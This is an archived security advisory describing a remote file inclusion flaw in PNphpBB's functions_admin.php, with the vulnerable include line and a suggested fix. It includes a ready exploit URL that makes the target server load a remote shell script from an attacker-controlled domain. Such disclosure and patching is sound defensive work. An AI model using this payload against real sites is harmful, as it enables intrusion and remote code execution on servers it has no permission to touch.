TUCoPS :: Web BBS :: Frequently Exploited :: b06-4775.htm

PNphpBB (Latest) Remote File Include
AzzCoder => PNphpBB (Latest) Remote File Include
AzzCoder => PNphpBB (Latest) Remote File Include


Vendor: http://www.pnphpbb.com/=0D 
=0D
Vulnerable File: includes/functions_admin.php=0D
=0D
Vulnerable Code:=0D
=0D
//The phpbb_root_path isn't initialize=0D
=0D
include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );=0D
=0D
Method To Use:=0D
=0D
http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?=0D 
=0D
How To Fix:=0D
=0D
Add this code before the include=0D
=0D
if ( !defined('IN_PHPBB') )=0D
{=0D
   die("Hacking attempt");=0D
}

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH